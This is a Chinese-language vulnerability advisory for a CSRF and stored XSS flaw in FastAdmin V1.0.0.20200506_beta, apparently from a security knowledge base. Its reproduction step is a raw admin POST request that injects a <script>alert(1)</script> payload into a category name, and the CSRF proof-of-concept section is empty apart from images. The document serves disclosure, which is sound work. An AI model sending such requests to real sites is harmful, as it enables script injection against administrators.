FastAdmin csrf+存储型xss漏洞

FastAdmin csrf+存储型xss漏洞
============================

一、漏洞简介
————

二、漏洞影响
————

V1.0.0.20200506\_beta

三、复现过程
————

POST /admin.php/category/add?dialog=1 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Origin: https://www.0-sec.org
Connection: close
Referer: http://admin.com/admin.php/category/add?dialog=1
Cookie: PHPSESSID=ou6fjfn717lu02rfm9saqguca4; uid=3; token=f824ac8c-ac7b-4979-a89b-b47dd8e79226

row%5Btype%5D=default&row%5Bpid%5D=0&row%5Bname%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&row%5Bnickname%5D=123&row%5Bimage%5D=1&row%5Bkeywords%5D=123&row%5Bdescription%5D=123&row%5Bweigh%5D=0&row%5Bstatus%5D=normal&row%5Bflag%5D%5B%5D=

### csrf poc
















![1.pngimg](/static/yougar/Web安全/FastAdmin/resource/FastAdmincsrf+存储型xss漏洞/media/rId25.png)

![2.pngimg](/static/yougar/Web安全/FastAdmin/resource/FastAdmincsrf+存储型xss漏洞/media/rId26.png)

参考链接
——–

> https://github.com/karsonzhang/fastadmin/issues/67

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容